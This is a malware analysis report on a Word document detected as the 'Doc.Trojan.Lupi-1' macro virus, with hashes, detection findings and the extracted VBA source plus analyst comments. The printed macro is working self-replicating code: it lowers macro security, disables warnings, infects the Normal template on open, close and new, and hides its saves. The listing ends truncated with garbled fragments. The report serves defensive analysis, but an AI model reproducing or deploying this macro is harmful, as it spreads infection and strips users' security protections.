Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 bb427ea30055fa7b…

MALICIOUS

Office (OLE)

51.0 KB Created: 1997-09-17 11:18:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 17080f5c4fe721c7a9e7c66b1b13138a SHA-1: a248657a766aba05a6507e3df6a267fde3cfeb3a SHA-256: bb427ea30055fa7b251bf12d33e9e43c32a7bcc2f58de838b7ef720de309f40a
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a Microsoft Word document containing VBA macros, specifically a Document_Open macro. The macro attempts to modify Word's security settings and interact with the Normal template, suggesting an attempt to establish persistence or facilitate further infection. The ClamAV detection as 'Doc.Trojan.Lupi-1' and the embedded artifact detection further confirm its malicious nature.

Heuristics 3

  • ClamAV: Doc.Trojan.Lupi-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Lupi-1
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 14191 bytes
SHA-256: 9a2d30d2074dac1af239608d0d9dc8af4dc6813c705f4da3a66baf06a512e517
Detection
ClamAV: Win.Trojan.wmvg-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit

'CISI-LUPI v1.02.002

' Line number, within the VBA code module, of the version comment just above.
' Presumably the Attribute lines are export metadata and are not counted, so
' module line 3 is the 'CISI-LUPI v1.02.002 comment. Cisi_Lupi reads this line
' from both the active document and the Normal template and feeds it to
' ProcessVersion to decide which copy is newer. Keep the comment above on
' this exact line: moving it breaks the self-version check.
Const virusIDRow = 3

Private Sub Cisi_Lupi()

'Destroy Virus with Virus...
'this is harmless virus
'code created by syarifl@bigfoot.com

'(translated from Indonesian) This small program will activate the VBA window,
'so that you can immediately see any intruder that gets into your VBA.
'I have tried it and it proved very effective for users with an
'intermediate skill level.

' Analyst notes: despite the "harmless" claim, this routine is a
' self-replicating macro. It lowers Word's macro security, then copies its
' own module between the active document and the Normal template, whichever
' side carries the older version string. Infecting Normal gives the code a
' foothold in every later document (cf. ATT&CK T1137.001, Office Template
' Macros, not listed in the report's technique set). Observable indicators in
' this code: the registry value written below, prompts being switched off,
' and VBProject access from a macro, which in later Word versions needs the
' "trust access to the VBA project" setting (TODO confirm per version).

'On Error Resume Next

  Dim regs
  ' Registry location of the Word 2000 (Office 9.0) macro security level.
  ' With an empty filename, System.PrivateProfileString reads and writes the
  ' registry rather than an .ini file.
  regs = "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security"
  If System.PrivateProfileString("", regs, "Level") <> "" Then
    ' Word 2000 branch: disable the Tools > Macro > Security... menu item so
    ' the user cannot raise the level again, then force Level to 1 (the
    ' lowest setting in that version - verify against the 9.0 key layout).
    CommandBars("Macro").Controls("Security...").Enabled = False
    System.PrivateProfileString("", regs, "Level") = 1&
  Else
    'CommandBars("Tools").Controls("Macro").Enabled = False
    ' Older Word (no 9.0 key): turn off the macro virus warning and the two
    ' prompts that would otherwise reveal a silent save of Normal.
    With Options
      .VirusProtection = False
      .ConfirmConversions = False
      .SaveNormalPrompt = False
    End With
  End If
  Dim adcp, adver
  Dim ntcp, ntver
  ' First VBA component of the active document and of the Normal template.
  ' Each copy identifies itself by the version comment on module line
  ' virusIDRow; ProcessVersion returns 0 when that line is missing or
  ' not a version string (i.e. the side is not yet infected).
  Set adcp = ActiveDocument.VBProject.VBComponents(1)
  Set ntcp = NormalTemplate.VBProject.VBComponents(1)
  adver = ProcessVersion(adcp.CodeModule.Lines(virusIDRow, 1))
  ntver = ProcessVersion(ntcp.CodeModule.Lines(virusIDRow, 1))
  Dim adln, ntln
  adln = adcp.CodeModule.CountOfLines
  ' Reads adcp again instead of ntcp, so ntln always equals adln and the
  ' (ntln <> 0) And (adln = 0) condition below can never hold as written.
  ntln = adcp.CodeModule.CountOfLines
  Dim src
  Dim dst
  Dim ExitNow
  ExitNow = True
  ' Copy direction: the side with the higher version overwrites the other.
  ' Equal versions (both infected with the same build, or both 0) mean
  ' nothing to do.
  If ntver > adver Then
    Set src = ntcp
    Set dst = adcp
    ExitNow = False
  ElseIf adver > ntver Then
    Set src = adcp
    Set dst = ntcp
    ExitNow = False
  End If
  If ExitNow Then Exit Sub
  Dim i
  ' Replication: empty the destination module from the bottom up, then copy
  ' the source module line by line (this routine included).
  For i = dst.CodeModule.CountOfLines To 1 Step -1
    dst.CodeModule.DeleteLines i, 1
  Next i
  For i = 1 To src.CodeModule.CountOfLines
    dst.CodeModule.InsertLines i, src.CodeModule.Lines(i, 1)
  Next i
  ' Hide the modification: re-save a named document in place without a
  ' prompt; a document whose name still contains "Document" (presumably a
  ' new, unsaved one - inferred from the name check) is just flagged as
  ' saved so Word does not ask about it on close.
  If (ntln <> 0) And (adln = 0) And (InStr(1, ActiveDocument.Name, "Document") = 0) Then
    ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
  ElseIf (InStr(1, ActiveDocument.Name, "Document") <> 0) Then
    ActiveDocument.Saved = True
  End If
End Sub

' Turns the trailing "N.NN.NNN" of a version line into a comparable Long.
' For the comment 'CISI-LUPI v1.02.002: Right(ver, 8) = "1.02.002", then
' 1*100000 + 02*1000 + 002 = 102002. Any error (empty input, a line that is
' not a version string, non-numeric pieces) yields 0, which Cisi_Lupi treats
' as "not infected". ver is modified in place (ByRef by default), which is
' harmless for the expression arguments the callers pass.
Private Function ProcessVersion(ver) As Long
On Error GoTo ProcessVersion_Err
  ver = Trim(ver)
  If ver = "" Then GoTo ProcessVersion_Err
  ver = Right(ver, 8)
  Dim x As Long
  ' Implicit string-to-number coercion; a type mismatch jumps to the handler.
  x = Left(ver, 1) * 100000
  x = x + Mid(ver, 3, 2) * 1000
  x = x + Right(ver, 3)
  ProcessVersion = x
  Exit Function
ProcessVersion_Err:
  ProcessVersion = 0
End Function

' Debug stub: the Exit Sub on the first line makes the MsgBox unreachable,
' so the event handlers below run silently. Re-enabling it would show the
' document name in the dialog title.
Private Sub MyMsgBox(Prompt)
  Exit Sub
  VBA.MsgBox Prompt, vbOKOnly, "CISI-LUPI (" & Me.Name & ")"
End Sub

' Auto-executes when the document is opened (the OLE_VBA_DOCOPEN finding).
' Forces the VBA editor window visible, then runs the replication routine.
Private Sub Document_Open()
  MyMsgBox "Document_Open"
  VBE.MainWindow.Visible = True
  Call Cisi_Lupi
End Sub

' Auto-executes on close: a second replication attempt, so a document that
' was clean on open but whose Normal template is infected is caught on the
' way out.
Private Sub Document_Close()
  MyMsgBox "Document_Close"
  'VBE.MainWindow.SetFocus
  Call Cisi_Lupi
End Sub

' Auto-executes when a new document is created from the template, which is
' how an infected Normal template spreads to fresh documents.
Private Sub Document_New()
  MyMsgBox "Document_New"
  'VBE.MainWindow.SetFocus
  Call Cisi_Lupi
End Sub

' Brings the VBA editor window to the front. Not called from any handler
' visible in this listing.
Private Sub ViewVbCode()
  MyMsgBox "VBE Setfocus"
  VBE.MainWindow.SetFocus
End Sub

' Resets every command bar and control to defaults and clears all keyboard
' bindings stored in the Normal template, discarding the user's UI
' customizations. Errors are ignored. Not called from any handler visible
' in this listing.
Private Sub Resetter()
On Error Resume Next
  Dim i%, j%
  For i = 1 To CommandBars.Count
    CommandBars(i).Reset
    For j = 1 To CommandBars(i).Controls.Count
      CommandBars(i).Controls(j).Reset
    Next j
  Next i
  ' Switch the customization target to Normal before clearing key bindings.
  CustomizationContext = NormalTemplate
  KeyBindings.ClearAll
End Sub

' Types the name of every command bar (bold) and the caption of each of its
' controls (tab-indented) into the document at the current selection,
' modifying document content. Not called from any handler visible in this
' listing; looks like an author's enumeration aid.
Private Sub cBars()
  Dim i%, j%
  For i = 1 To CommandBars.Count
    Selection.Font.Bold = True
    Selection.TypeText CommandBars(i).Name
    Selection.Font.Bold = False
    Selection.TypeParagraph
    For j = 1 To CommandBars(i).Controls.Count
      Selection.TypeText vbTab & CommandBars(i).Controls(j).Caption
      Selection.TypeParagraph
    Next j
  Next i
End Sub

' Author's test harness for ProcessVersion; the result is discarded.
' virusID is not declared anywhere in the visible portion of the module;
' under Option Explicit it must be declared in the truncated remainder or
' the module would not compile - TODO confirm against the full extract.
Private Sub Tester()
  Dim x As Long
  x = ProcessVersion(virusID)
End Sub
     ActiveDocument.Saved = False) Then
     ActiveDocument.Saved = False) Then
     ActiveDocument.S
... (truncated)